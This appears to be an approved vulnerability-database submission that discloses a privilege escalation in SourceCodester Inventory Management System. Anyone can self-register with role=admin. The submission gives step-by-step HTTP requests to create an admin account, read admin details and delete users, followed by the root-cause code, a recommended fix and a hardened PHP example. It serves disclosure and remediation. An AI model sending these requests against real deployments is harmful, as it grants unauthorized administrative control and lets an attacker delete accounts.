Submission #844257: SourceCodester Inventory Management System NA Improper Access Controls

Information

Title: SourceCodester Inventory Management System NA Improper Access Controls
Description

Summary

The user registration endpoint at POST /api/users_handler.php accepts a role parameter directly from user input without server-side validation. Any unauthenticated visitor can register an account with role=admin, granting immediate access to the admin panel, user management (create/delete/modify users), and all administrative functions. No privileges, approval workflow, or additional verification is required.

Vulnerability Details

Vulnerability Type: Broken Access Control (Privilege Escalation via Mass Assignment)
CVSS 3.1 Score: 9.8 (Critical), vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Affected Endpoint: POST /api/users_handler.php with action=register
Vulnerable Parameter: role (line 38 of api/users_handler.php)

Steps to Reproduce

Environment:
- Target: http://localhost/Product_Inventory/
- Attacker: Unauthenticated (no account needed)

Steps:

1. Send the following request to register a new admin account:

    POST /Product_Inventory/api/users_handler.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded

    action=register&username=attacker&password=attacker123&full_name=Attacker+User&role=admin

2. Observe the successful response:

    {"success":true,"message":"User registered successfully!"}

3. Log in with the newly created admin account:

    POST /Product_Inventory/api/users_handler.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded

    action=login&username=attacker&password=attacker123

4. The response confirms successful authentication:

    {"success":true,"message":"Login successful!"}

5. Access admin-only endpoints (verified):

    POST /Product_Inventory/api/users_handler.php HTTP/1.1
    Host: localhost
    Cookie: PHPSESSID=<session_cookie>

    action=get_user&id=1

   The response returns full admin user details:

    {"id":1,"username":"admin","full_name":"GANESH DUTT","role":"admin"}

6. Modify or delete any user (verified):

    POST /Product_Inventory/api/users_handler.php HTTP/1.1
    Host: localhost
    Cookie: PHPSESSID=<session_cookie>

    action=delete_user&id=3

   Response:

    {"success":true,"message":"User deleted successfully!"}

Expected: Registration should only create staff accounts. The admin role should require existing admin approval or be hardcoded in the registration flow.

Actual: Any user can self-assign the admin role during registration.

Root Cause

The vulnerable code at api/users_handler.php:38 directly assigns the user-supplied role parameter:

    $role = $_POST['role'] ?? 'staff';

This value is then inserted into the database without validation:

    $stmt = $pdo->prepare("INSERT INTO users (username, password, full_name, role) VALUES (?, ?, ?, ?)");
    $stmt->execute([$username, $hashed_password, $full_name, $role]);

Impact

An unauthenticated attacker can:

1. Create admin accounts: register with role=admin to gain full administrative access
2. Delete any user: remove legitimate admin accounts via the delete_user action
3. Modify user credentials: change passwords, usernames, and roles of any account via update_user
4. Access the admin panel: view the user management interface at users.php
5. Full system compromise: combined with stored XSS vulnerabilities, achieve persistent admin session hijacking

This represents a complete authentication bypass. The attacker gains the highest privilege level in the application without any preconditions.

Recommended Fix

Remove the role parameter from user-controlled input during registration. Hardcode the default role:

    case 'register':
        $username = $_POST['username'] ?? '';
        $password = $_POST['password'] ?? '';
        $full_name = $_POST['full_name'] ?? '';
        // FIX: Always assign 'staff' role during self-registration
        $role = 'staff';

If admin account creation is needed, implement a separate endpoint protected by requireAdmin():

    case 'create_admin':
        requireAdmin();
        $role = 'admin';
        // ... rest of registration logic

Additionally, add server-side role validation as a defense-in-depth measure:

    $allowed_roles = ['staff', 'admin'];
    if (!in_array($role, $allowed_roles)) {
        echo json_encode(['success' => false, 'message' => 'Invalid role.']);
        exit;
    }
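The three parts of the recommended fix combined into one handler, as an added example that is not code from SourceCodester Inventory Management System or from the submitter: self-registration fixes the role server-side and never reads a role field from the request body, admin creation is a separate action that checks the caller's own role, and every role value passes an allow-list check before the INSERT. It assumes a PDO handle, a users(username, password, full_name, role) table as quoted in the advisory, and that the surrounding code reads the authenticated caller's role from the session and passes it in as $sessionRole; the function names and the SQLite schema are constructed for the demo.

```php
<?php
// Added example, not the project's code. Hardened account-creation flow for a
// users_handler.php-style endpoint. Assumptions: PDO handle, a users table with
// (username, password, full_name, role) as in the advisory, caller's role
// supplied by the surrounding session code as $sessionRole (null = anonymous).
declare(strict_types=1);

const ALLOWED_ROLES = ['staff', 'admin'];

// Defense in depth: only allow-listed roles reach the database (strict compare).
function isValidRole(string $role): bool
{
    return in_array($role, ALLOWED_ROLES, true);
}

// Shared insert path; returns the JSON-style array the endpoint would emit.
function createUser(PDO $pdo, string $username, string $password, string $fullName, string $role): array
{
    if ($username === '' || $password === '') {
        return ['success' => false, 'message' => 'Username and password are required.'];
    }
    if (!isValidRole($role)) {
        return ['success' => false, 'message' => 'Invalid role.'];
    }
    $stmt = $pdo->prepare(
        'INSERT INTO users (username, password, full_name, role) VALUES (?, ?, ?, ?)'
    );
    $stmt->execute([$username, password_hash($password, PASSWORD_DEFAULT), $fullName, $role]);
    return ['success' => true, 'message' => 'User registered successfully!'];
}

// Dispatch for the two account-creation actions. $post is the decoded POST body.
function handleUserAction(PDO $pdo, array $post, ?string $sessionRole): array
{
    $username = (string) ($post['username'] ?? '');
    $password = (string) ($post['password'] ?? '');
    $fullName = (string) ($post['full_name'] ?? '');

    switch ($post['action'] ?? '') {
        case 'register':
            // Self-registration: the role is decided here, never read from $post,
            // so a 'role' field in the request body has no effect.
            return createUser($pdo, $username, $password, $fullName, 'staff');

        case 'create_admin':
            // Equivalent of requireAdmin(): only an existing admin may create one.
            if ($sessionRole !== 'admin') {
                return ['success' => false, 'message' => 'Admin privileges required.'];
            }
            return createUser($pdo, $username, $password, $fullName, 'admin');

        default:
            return ['success' => false, 'message' => 'Unknown action.'];
    }
}

// Self-contained demo on an in-memory SQLite database (constructed schema).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT UNIQUE, '
    . 'password TEXT NOT NULL, full_name TEXT, role TEXT NOT NULL)');

// Constructed request body: an anonymous caller sends role=admin with register.
$request = ['action' => 'register', 'username' => 'newuser', 'password' => 'correct-horse',
            'full_name' => 'New User', 'role' => 'admin'];
$result = handleUserAction($pdo, $request, null);
$stored = $pdo->query("SELECT role FROM users WHERE username = 'newuser'")->fetchColumn();
echo json_encode($result), PHP_EOL;
echo 'stored role for newuser: ', $stored, PHP_EOL;   // the server-chosen role, not the client's

// The same anonymous caller is refused on the admin-creation action.
$denied = handleUserAction($pdo, ['action' => 'create_admin', 'username' => 'x', 'password' => 'y'], null);
echo json_encode($denied), PHP_EOL;
```

Run it with the PHP CLI (pdo_sqlite required). The point to verify in a code review is that the only assignment to $role in the register path is a literal, and that the role column is written only through createUser(), so the allow-list check cannot be bypassed by a second code path.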
User: Anonymous User
Submitted: 31/05/2026 04:23 PM (29 days ago)
Moderation: 28/06/2026 08:22 PM (28 days later)
Status: Approved
VulDB Entry: 374576 [SourceCodester Inventory Management System 1.0 User Registration Endpoint /api/users_handler.php role privilege escalation]
Points: 17
